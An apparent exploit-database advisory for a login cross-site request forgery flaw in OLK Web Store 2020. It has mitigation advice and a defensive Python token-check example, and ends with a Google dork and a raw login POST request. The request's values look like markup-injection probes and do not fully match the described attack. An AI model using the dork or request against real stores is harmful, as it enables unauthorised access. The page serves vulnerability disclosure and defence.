Vendor: OLK Web Store
By: Joel Aviad Ossi
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: OLK Web Store
Affected Version From: 2020
Affected Version To: 2020
Patch Exists: NO
Related CWE: N/A
CPE: a:topmanage:olk_web_store:2020
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

OLK Web Store 2020 – Cross-Site Request Forgery

This exploit allows an attacker to perform a Cross-Site Request Forgery (CSRF) attack against the login page of OLK Web Store 2020. The attacker crafts a request to the login page and has it submitted by the victim's browser, which happens transparently because the login form is not protected by an anti-CSRF token. The forged request carries the attacker's own credentials, so the victim's browser is authenticated as the attacker and gains access to the OLK Web Store 2020 under the attacker's account (a login CSRF).

Mitigation:

The best way to mitigate CSRF attacks is to combine server-side and client-side measures. On the server side, the application should bind a secret, unpredictable token to the user's session, embed it in every form (the login form included), and reject any request whose token is missing or does not match the session's token, so that only requests originating from pages the application itself rendered are accepted. On the client side, the application should use a CAPTCHA or another form of verification to confirm that the request was made by a human.
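
The following is an added example of the server-side check described above; it is not code from the advisory or from TopManage. It models a login endpoint that issues a synchronizer token to the anonymous (pre-login) session, embeds it in the login form, and on POST verifies both the token and the browser-supplied Origin/Referer header before it even looks at the submitted credentials. The session store, cookie name `sid`, field name `csrf_token` and the site origin are constructed assumptions; the forged body is modelled on the request in the raw data below, which carries no token.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed example: a minimal in-memory session store keyed by the value of
# a "sid" cookie. A real application would use its framework's session store.
SESSIONS = {}
SITE_ORIGIN = "https://examplesite.com"  # the store's own origin (assumed)


def new_session():
    """Create an anonymous (pre-login) session and bind a fresh CSRF token to it.

    Issuing the token before authentication is what defeats login CSRF: the
    login form itself carries a secret that a third-party page cannot read.
    """
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32), "user": None}
    return sid


def render_login_form(sid):
    """Return the login form with the session's token as a hidden field."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form method="post" action="/olk/client/login.asp">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="UserName"><input name="Password" type="password">'
        '<input type="submit" name="btnEnter" value="Enter"></form>'
    )


def parse_cookies(header):
    """Parse a Cookie request header into a dict (constructed helper)."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def verify_login_post(headers, body):
    """Decide whether a POST to the login endpoint may be processed.

    headers: dict of request headers (looked up case-insensitively)
    body:    raw application/x-www-form-urlencoded request body
    Returns (accepted, reason).
    """
    h = {k.lower(): v for k, v in headers.items()}

    # 1. The request must belong to a session that was issued a token.
    sid = parse_cookies(h.get("cookie", "")).get("sid")
    session = SESSIONS.get(sid)
    if session is None:
        return False, "no session"

    # 2. Browsers add Origin on cross-site POSTs and a page cannot forge it,
    #    so a foreign Origin (or Referer, as fallback) is rejected outright.
    source = h.get("origin") or h.get("referer", "")
    if source != SITE_ORIGIN and not source.startswith(SITE_ORIGIN + "/"):
        return False, "cross-origin request"

    # 3. Synchronizer token: must equal the session's token, compared in
    #    constant time so a timing side channel cannot leak it.
    submitted = parse_qs(body).get("csrf_token", [""])[0]
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return False, "missing or invalid CSRF token"

    # Only now is it safe to read UserName/Password and authenticate.
    return True, "ok"


def demo():
    """One legitimate submission and one forged one; returns both verdicts."""
    sid = new_session()
    token = SESSIONS[sid]["csrf_token"]

    # Legitimate: form rendered by the site, token present, same origin.
    good = verify_login_post(
        {"Cookie": f"myLng=en; sid={sid}", "Origin": SITE_ORIGIN},
        f"dbID=0&UserName=alice&Password=secret&csrf_token={token}&btnEnter=Enter",
    )

    # Forged: body shaped like the advisory's request (no token), auto-submitted
    # from a third-party page, so the browser stamps a foreign Origin on it.
    forged = verify_login_post(
        {"Cookie": f"myLng=en; sid={sid}", "Origin": "https://attacker.example"},
        "dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=",
    )
    return good, forged


if __name__ == "__main__":
    print(demo())
```

Either check alone rejects the forged request; the token check is the one that also covers clients that strip Origin and Referer, which is why the advisory's mitigation leads with it. Note that the token is compared before the credentials are read, so a forged login attempt never reaches the authentication logic.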

Exploit-DB raw data:

# Exploit Title: OLK Web Store 2020 - Cross-Site Request Forgery
# Google Dork: intext:"TopManage ® 2002 - 2020"
# Date: 2020-01-13
# Exploit Author: Joel Aviad Ossi
# Vendor Homepage: http://www.topmanage.com/
# Software Link: http://www.topmanage.com/microsites/olk-web-store/
# Version: 2020
# Tested on: N/A
# CVE : N/A

# Reference: https://websec.nl/news.php

POST /olk/client/login.asp HTTP/1.1
Host: examplesite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: https://examplesite.com
Connection: close
Referer: https://examplesite.com/olk/client/login.asp?se=Y
Cookie: myLng=en; ASPSESSIONIDCGARQSCD=JGFFLBIAAKGBKANKLAPHMEDH
Upgrade-Insecure-Requests: 1

dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=